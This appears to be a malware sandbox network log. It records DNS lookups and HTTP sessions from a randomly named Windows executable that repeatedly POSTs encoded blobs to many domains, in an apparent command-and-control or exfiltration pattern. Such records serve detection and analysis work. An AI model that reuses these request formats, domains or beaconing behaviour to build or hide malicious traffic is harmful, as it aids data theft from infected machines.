| Aug 27, 2024 07:59:28.104723930 CEST | 9.9.9.9 | 192.168.11.20 | 0x7d62 | No error (0) | www.itemfilterhub.shop | | 104.21.50.202 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:41.594192982 CEST | 9.9.9.9 | 192.168.11.20 | 0xf5ce | No error (0) | www.bullbord.top | | 203.161.46.205 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 07:59:55.552339077 CEST | 9.9.9.9 | 192.168.11.20 | 0xad47 | No error (0) | www.cannulafactory.top | | 18.183.3.45 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:00:09.608885050 CEST | 9.9.9.9 | 192.168.11.20 | 0x6d96 | No error (0) | www.7ddw.top | 7ddw.top | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 27, 2024 08:00:09.608885050 CEST | 9.9.9.9 | 192.168.11.20 | 0x6d96 | No error (0) | 7ddw.top | | 154.23.184.207 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:00:23.919327974 CEST | 9.9.9.9 | 192.168.11.20 | 0x2c1 | No error (0) | www.home-check.shop | | 185.230.15.3 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:00:51.366111994 CEST | 9.9.9.9 | 192.168.11.20 | 0xd5f2 | No error (0) | www.emeluzunmoda.online | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 27, 2024 08:00:51.366111994 CEST | 9.9.9.9 | 192.168.11.20 | 0xd5f2 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 27, 2024 08:00:51.366111994 CEST | 9.9.9.9 | 192.168.11.20 | 0xd5f2 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:01:05.348082066 CEST | 9.9.9.9 | 192.168.11.20 | 0x5d3f | No error (0) | www.ayypromo.shop | | 176.57.64.102 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:01:18.955868959 CEST | 9.9.9.9 | 192.168.11.20 | 0xc964 | No error (0) | www.magicface.shop | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:01:18.955868959 CEST | 9.9.9.9 | 192.168.11.20 | 0xc964 | No error (0) | www.magicface.shop | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:01:32.252120972 CEST | 9.9.9.9 | 192.168.11.20 | 0xb82c | No error (0) | www.hypepgbet.online | | 82.112.244.92 | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:03:27.439057112 CEST | 9.9.9.9 | 192.168.11.20 | 0xa674 | Name error (3) | www.sedezne-blazine.shop | none | none | A (IP address) | IN (0x0001) | false |
| Aug 27, 2024 08:05:25.845122099 CEST | 9.9.9.9 | 192.168.11.20 | 0xdf5c | No error (0) | www.multfiber.net | multfiber.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Aug 27, 2024 08:05:25.845122099 CEST | 9.9.9.9 | 192.168.11.20 | 0xdf5c | No error (0) | multfiber.net | | 84.32.84.32 | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.11.20 | 49841 | 199.59.243.226 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe |

Timestamp | Bytes transferred | Direction | Data
Aug 27, 2024 07:58:02.327053070 CEST | 555 | OUT | GET /enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Aug 27, 2024 07:58:02.430035114 CEST | 1200 | IN | HTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 05:58:01 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1478
                                                x-request-id: 58a53c6f-ee4c-4d7c-b6e5-be9123508806
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Im6T6/pqCTudfemr3/Ry3QOMsMpidAGuIZS152vKDAPS35jIwkuAAyjevEKaV89FkqL+9D93AJ/s2twwhb4hMA==
                                                set-cookie: parking_session=58a53c6f-ee4c-4d7c-b6e5-be9123508806; expires=Tue, 27 Aug 2024 06:13:02 GMT; path=/
                                                connection: close
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Im6T6/pqCTudfemr3/Ry3QOMsMpidAGuIZS152vKDAPS35jIwkuAAyjevEKaV89FkqL+9D93AJ/s2twwhb4hMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                Aug 27, 2024 07:58:02.430104971 CEST967INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNThhNTNjNmYtZWU0Yy00ZDdjLWI2ZTUtYmU5MTIzNT


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.11.20 | 49842 | 103.247.8.53 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:24.452451944 CEST | 835 | OUT | POST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:24.993861914 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:58:24 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.11.20 | 49843 | 103.247.8.53 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:27.337610006 CEST | 1175 | OUT | POST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:29.685707092 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:58:27 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.11.20 | 49844 | 103.247.8.53 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:30.216247082 CEST | 2578 | OUT | POST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:32.565346956 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:58:30 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.11.20 | 49845 | 103.247.8.53 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:33.097264051 CEST | 553 | OUT | GET /21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:33.565958977 CEST | 518 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:58:33 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: http://asa-malukuutara.com/21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb
                                                Vary: Accept-Encoding
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.11.20 | 49846 | 96.126.123.244 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:47.033322096 CEST | 823 | OUT | POST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=8FGBhUcVYFkEMgLVSbNUtBducYVUQdIxBQBklUIxT6dfc4R0kiL3gkROoLdtqWlUowxC5I8FlAOqAZu7S27RXIFefn7BqGLHKVKbo0Lz3YAth6VrcpUamp357AyE8SdHBdoOyi96TtslQhIgw0h/1NV5ahOkzTp5DwuZlCy6totjjVaboFSnlmwqQL3afuyMkg==
                                                Aug 27, 2024 07:58:47.168495893 CEST | 803 | IN | HTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:47 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.11.20 | 49847 | 96.126.123.244 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:49.696741104 CEST | 1163 | OUT | POST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY= [TRUNCATED]
                                                Aug 27, 2024 07:58:49.833240032 CEST | 803 | IN | HTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:49 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.11.20 | 49848 | 96.126.123.244 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:52.368853092 CEST | 12890 | OUT | POST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY= [TRUNCATED]
                                                Aug 27, 2024 07:58:52.503048897 CEST | 778 | IN | HTTP/1.1 413 Request Entity Too Large
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:52 GMT
                                                content-type: text/html
                                                content-length: 607
                                                connection: close
                                                Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.11.20 | 49849 | 96.126.123.244 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:58:55.036791086 CEST | 549 | OUT | GET /o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:55.172287941 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:55 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                connection: close
                                                Data Ascii: 498<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1724738335.0053358673&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICJpajYwTXRZPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZ3WEI9YnJ2NEVyYiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhd [TRUNCATED]
                                                Aug 27, 2024 07:58:55.172358036 CEST | 55 | IN | Data Ascii: } </script> </body></html>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.11.20 | 49850 | 23.231.158.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:00.778865099 CEST | 808 | OUT | POST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=7S9CtUeCTvzqlFJG8nZrHOTr3+Gv4XjjsEBMyXWJ2ZzcJgfqcOg7KvAlyNMG9yLtVzldeElSVO1dBUQ1AbR0WJb1atmDjlQCLiMop1Rn6wPqdB61VvNRBKxzDuOJR5Cb1PjuGSHokfhqcIQgTPEIXcaVNJ0cVvstCLNIPHJBWvilDSpKZLOa/mM1dghTvjJ1og==


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.11.20 | 49851 | 23.231.158.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:03.624777079 CEST | 1148 | OUT | POST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY= [TRUNCATED]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.11.20 | 49852 | 23.231.158.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:06.475186110 CEST | 1289 | OUT | POST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY= [TRUNCATED]
                                                Data Ascii: gInoMOoFLGSnJ1PfVBLpvW9BSZxaLLPYsX+P1aHG+W5xnsx8ORi4KsE18L3W0WPS2qxUIQ3ZSUB89OZIzwyusJXr1ehlrhV/ZeujuPMyPXd/lN+zFv5KgHET0FE7eQjnYGpWI1KG795CqjmgimE8aHW0Mb7aiC2C9YMatYFxMofbkmcrIbKFXAcLOUqr/A0mEW9D733CVQMzNzHgLH1g3onANlVXf/q/8mdbh6TWiC7wxd+85z5
                                                Aug 27, 2024 07:59:06.795361996 CEST10312OUTData Raw: 59 67 32 34 30 4f 39 6c 7a 55 70 61 31 68 45 41 55 32 31 74 39 34 43 76 4f 33 38 37 6e 74 43 6e 49 49 45 34 48 49 33 7a 4c 6f 58 32 38 56 2b 62 6a 6d 58 71 61 63 33 77 43 37 5a 50 32 61 6b 5a 57 46 45 67 4a 36 4a 71 75 33 64 67 30 43 66 79 6a 30
                                                Data Ascii: Yg240O9lzUpa1hEAU21t94CvO387ntCnIIE4HI3zLoX28V+bjmXqac3wC7ZP2akZWFEgJ6Jqu3dg0Cfyj09fraFKo07PaChWCKuUKg26S4y+E79XPdUe+xzFowPDPayaHHnF1Q56gvKiNoiNMAQb39jQ3h6EVNga90KljSlC9ofSwS69xhAMIJziQiVScgX6OP0UwKWYrXb71Tn255CLdmoFsWZySF/X/Bvt93ZOgsb1+DLiceF
                                                Aug 27, 2024 07:59:06.795527935 CEST1289OUTData Raw: 43 77 79 73 78 65 6a 6f 2b 59 74 67 33 50 68 2f 44 62 33 52 59 48 56 4b 37 6c 59 4e 66 31 41 39 69 59 70 59 77 51 5a 47 79 4e 39 4f 72 7a 4f 52 68 2f 32 44 38 54 47 42 71 6b 2b 65 49 43 50 65 64 31 6c 32 59 66 58 61 76 42 78 58 4e 4d 57 4a 67 63
                                                Data Ascii: Cwysxejo+Ytg3Ph/Db3RYHVK7lYNf1A9iYpYwQZGyN9OrzORh/2D8TGBqk+eICPed1l2YfXavBxXNMWJgcr/b2z6NvIHuPPVft5k08pwRXw1cx/iBbHJADm9EdZFoC3/DkXJWr3q4Z2HwKo8NTJIITHXijeHk5X2Rc/T7v4fgmeqcxhLEYuJateyws94nWfdEfj4ufXqaIAqkDSxtcvwl/4Afu58PxQ2WUK8Cx3H+xBAZyL9Aar
                                                Aug 27, 2024 07:59:06.795697927 CEST1289OUTData Raw: 74 33 4a 65 31 39 6f 71 46 69 2f 2b 6e 49 41 56 78 63 4a 72 47 6d 44 68 2f 4b 53 46 45 52 71 49 4d 50 62 4a 71 79 50 4e 44 6e 63 5a 32 39 31 52 4b 47 46 74 30 75 4c 6c 65 71 46 53 49 66 59 59 7a 70 38 2f 6f 46 70 4c 4d 55 49 66 70 73 4d 36 68 47
                                                Data Ascii: t3Je19oqFi/+nIAVxcJrGmDh/KSFERqIMPbJqyPNDncZ291RKGFt0uLleqFSIfYYzp8/oFpLMUIfpsM6hGhnWMVa7rbL7KXeDMvGZCtI1Wuo0mYK9s3z16aOCoJYPNKy9wdsAdd4InKLE5OB5hdu5M8TpovnK2RDf2bG1EHzY/6Zmg71tNl94jynaYgtijAwiOWiQAQSTe11IxkZDPCvndXGIN3TQJivJbMdBjx/WccSVhevZG5


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.11.20 | 49853 | 23.231.158.3 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
